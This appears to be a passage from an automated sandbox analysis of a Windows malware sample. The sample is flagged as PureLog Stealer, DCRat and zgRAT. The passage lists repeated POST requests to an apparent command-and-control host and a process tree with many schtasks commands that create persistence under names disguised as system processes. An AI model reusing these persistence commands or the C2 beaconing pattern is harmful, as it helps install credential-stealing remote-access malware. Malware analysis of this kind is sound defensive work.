                                    Data Ascii: _VYWQDT][_ZQYSXUW[]SWZSXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X83?6'#0>=3<>?[8 $!!?#35^/.&F$.Y/5
                                    Aug 25, 2024 15:47:01.823167086 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:02.020256996 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    94 | 192.168.2.8 | 49807 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:02.154654980 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:47:02.511579037 CEST | 2544 | OUT | Data Raw: 5f 5d 59 54 54 41 54 59 5b 5f 5a 51 59 53 58 55 57 5a 5d 52 57 59 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]YTTATY[_ZQYSXUWZ]RWYS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,U3@6$#39\=4<=%[+=/7?0 ;+:7^ 5Y;&F$.Y/5
                                    Aug 25, 2024 15:47:02.817625046 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:02.946326017 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    95 | 192.168.2.8 | 49808 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:03.081351995 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:03.495616913 CEST | 2544 | OUT | Data Raw: 5f 54 59 50 54 46 51 5e 5b 5f 5a 51 59 56 58 52 57 59 5d 5e 57 5d 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYPTFQ^[_ZQYVXRWY]^W]SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.\;3"0Y" "*$\<-_?,7?7<*97"09]8&F$.Y/!
                                    Aug 25, 2024 15:47:03.753434896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:03.950560093 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    96 | 192.168.2.8 | 49809 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:04.104310989 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:04.448987007 CEST | 2544 | OUT | Data Raw: 5a 56 5c 5e 51 45 51 5b 5b 5f 5a 51 59 53 58 52 57 5f 5d 52 57 50 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^QEQ[[_ZQYSXRW_]RWPS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8/!0\76*=<]+>(=4Z3#",<:<4:/&F$.Y/5
                                    Aug 25, 2024 15:47:04.773593903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:04.920119047 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    97 | 192.168.2.8 | 49810 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:05.047229052 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:05.402195930 CEST | 2544 | OUT | Data Raw: 5f 57 59 55 54 40 54 51 5b 5f 5a 51 59 55 58 56 57 5d 5d 59 57 5a 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _WYUT@TQ[_ZQYUXVW]]YWZSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.^;3?5X 6*4]>>)[<'[#,+S 1,*:$7%\8&F$.Y/-
                                    Aug 25, 2024 15:47:05.743324041 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:05.942663908 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Target ID:1
                                    Start time:09:45:00
                                    Start date:25/08/2024
                                    Path:C:\Users\user\Desktop\Internal.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Internal.exe"
                                    Imagebase:0x4f0000
                                    File size:3'265'288 bytes
                                    MD5 hash:15E81B6E3999600603D0F8B0DD22C33E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:45:02
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe"
                                    Imagebase:0x8e0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:4
                                    Start time:09:45:30
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Imagebase:0xa40000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:09:45:31
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:09:45:31
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\AgentMonitor.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Blockcomcrt/AgentMonitor.exe"
                                    Imagebase:0x830000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    Target ID:7
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Imagebase:0x7ff6f9f10000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:11
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"
                                    Imagebase:0x7ff6f88b0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:13
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Imagebase:0x7ff6f9f10000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:14
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"
                                    Imagebase:0x7ff6f88b0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:16
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Imagebase:0xc50000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Has exited:false

                                    Target ID:17
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Imagebase:0x8d0000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 7 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 10 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "AgentMonitor" /sc ONLOGON /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
